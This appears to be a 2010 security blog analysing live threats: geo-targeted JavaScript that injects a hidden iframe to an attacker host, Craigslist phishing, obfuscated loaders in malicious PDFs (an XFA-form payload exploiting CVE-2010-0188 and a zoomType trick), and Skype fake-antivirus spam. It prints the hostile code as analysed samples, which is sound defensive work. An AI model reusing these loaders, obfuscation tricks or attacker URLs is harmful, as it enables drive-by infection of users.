marco
blog
Menu:
Geographical targeting of attacks
December 15, 2010
Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:
var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0) {
document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}
The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.
Certainly not new, but still interesting...
Craigslist phishing
December 11, 2010
Another interesting attack that targets Craigslist users. I've just received an email with the following content:
Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html
Thank you.
Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist:
It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.
Stay away from this guy and this site...
Malicious PDF trick: XFA
November 15, 2010
Another trick that is becoming more and more common in malicious PDF files consists of storing the actual malicious content (for example, JavaScript code that exploits some vulnerability) into XFA forms. If you remember the getPageNthWord, getAnnots, and the info tricks that have been documented earlier, you will recognize the technique been used here.
So, what is an XFA form? XFA stands for XML Forms Architecture and it is a specification used to create form templates (forms that can be filled in by a user) and to process them (for example, validate their contents). Support for XFA forms in PDF files has been introduced by Adobe with PDF 1.5. If you want to know all the gory details, you can refer to the original XFA proposal or to the Adobe's XFA specification, which, however, being 1123-page long may be a hard read.
Let's see how it used abused in practice (the MD5 of the sample I'm analyzing is 1f26dcd4520a6965a42cefa4c7641334). The PDF first defines an XFA template, which is used to describe the appearance and interactive characteristics of the form.
obj 10 0
<<
/Type /EmbeddedFile
/Length 618
/Filter /FlateDecode
>>
stream
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="artsLei">
<pageSet>
<pageArea id="leiArts" name="leiArts">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt " name="docTaut">
<field h="65mm" name="docArts" w="85mm" x="53.6501mm" y="88.649 9mm">
<event activity="initialize" name="tautDoc">
<script contentType="application/x-javascript">
var nil = (function(){return this;}).call(null);
...
eval_ref(decode(docArts[\'ra\'+ue+\'wVa\'+ue+\' lue\'].substring(50),eval_ref));
</script>
</event>
<ui><imageEdit/></ui>
</field>
</subform>
</subform>
</template>
endstream
endobj
A couple of interesting parts: the template defines a field, named
docArts. Note that a reference to this field will be available through
an object named docArts in the global scope of JavaScript (i.e.,
this.docArts is a Field object that represents this field).
The field also has an event handler to handle its initialization. The
handler is written in JavaScript and has the familiar aspect of
obfuscated code.
Let's see what this code does:
var nil = (function(){return this;}).call(null);
var eval_ref = nil['eval'];
function decode(str, ev){
var ret = '';
var cvc = [];
var fcc = String.fromCharCode;
var k = docArts['rawValue'].substring(0, 50);
...
return ret;
}
eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));
The interesting bits here are the references to the docArts object.
Notice that its rawValue property is retrieved. So, where is the value
of the field stored? In an XFA dataset:
obj 12 0
<<
/Filter /FlateDecode
/Length 3388
/Type /EmbeddedFile
>>
stream
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<artsLei>
<docArts>
[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]
[80,87,70,83,71,77,80,88,16,
...
78,66,74,79,21,86,79,68,8,9,59]
</docArts>
</artsLei>
</xfa:data>
</xfa:datasets>
endstream
endobj
Therefore, the obfuscated JavaScript extracts the data stored for the docArts field (precisely, all the content after the initial 50 characters) and passes it for decoding to the decoding routine. The decoding routine also uses the docArts data (the first 50 characters) to retrieve the malicious code in the clear, which is ready to be evaluated. The execution finally results with an exploitation of the CVE-2010-0188 vulnerability (libTiff overflow).
Malicious PDF trick: zoomType
November 14, 2010
Here is another small trick that malicious PDFs use. The PDF contains JavaScript code similar to the following:
var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1= event["tar"+part4]["z"+part3+part3+"m"+part2+part1];
fun1 = varka_tipo[1]+"nde"+part5;
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"abcdefghijklmnopqrstuvwxyz" +
"0123456789"+
"+/=";
function decode(input) {
...
enc1 = keyStr[fun1](input.charAt(i++));
...
}
var code = decode("Q2!#$%^&5a...#$%^&o=!#$%^&");
eval(code);
This script sets up some variables that are used in a decoding routine. As usual, the routine decodes a long string and the result is then interpreted via eval().
The interesting part is how fun1 is computed. Undoing the simple
obfuscation shows that it is initialized to event.target.zoomType.
Now, event.target is a reference to the Doc object. The Doc object's
property zoomType contains the current zoom type of the document. The
documentation lists 7 possible values:
- NoVary
- FitPage
- FitWidth
- FitHeight
- FitVisibleWidth
- Preferred
- ReflowWidth
Adobe Reader seems to return FitWidth by default.
The next step in the script extracts the second character from the zoom
type string (the letter i) and concatenates to other strings to obtain
indexOf.
A long way to get an i...
More Skype spam
September 15, 2010
I have been hit by what appears to be yet another round of Skype spam. As it happened before, also this attack seems to be related to fake AV scams.
Here is a screenshot of a contact request I've received today from some notific.alrm.us.13.
The full text of the contact request leaves few doubts to the intents of the request:
This is an urgent Security Center Message ! Please click on "Add to Contacts" and follow instructions to update your system ! After adding contact, go to "Conversations" tab, read and follow instructions !
WINDOWS REQUIRES IMMEDIATE ATTENTION URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser !
FULL DETAILS OF SCAN RESULT BELOW
WINDOWS REQUIRES IMMEDIATE ATTENTION
ATTENTION ! Security Center has detected malware on your computer !
Affected Software:
Microsoft Windows 7 Microsoft Windows Vista Microsoft Windows XP Microsoft Windows Server 2003
Impact of Vulnerability: Remote Code Execution / Virus Infection / Unexpected shutdowns
Recommendation: Users running vulnerable version should install a repair utility immediately
Your system IS affected, download the patch from the address below ! Failure to do so may result in severe computer malfunction.
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser!
The advertised domain, www.updatedp.com, currently serves me the
default It works! page of Apache. Interestingly, that domain has quite
a long history of maliciousness (at least all the way back to
2003!)
The following usernames are also likely to be involved in this scam:
- notific.alrm.us.1
- notific.alrm.us.2
- notific.alrm.us.3
- notific.alrm.us.4
- notific.alrm.us.5
- notific.alrm.us.6
- notific.alrm.us.7
- notific.alrm.us.8
- notific.alrm.us.9
- notific.alrm.us.10
- notific.alrm.us.11
- notific.alrm.us.12
- notific.alrm.us.13
- notific.alrm.us.14
- notific.alrm.us.15
- notific.alrm.us.16
- notific.alrm.us.17
- notific.alrm.us.18
- notific.alrm.us.19
- notific.alrm.us.20
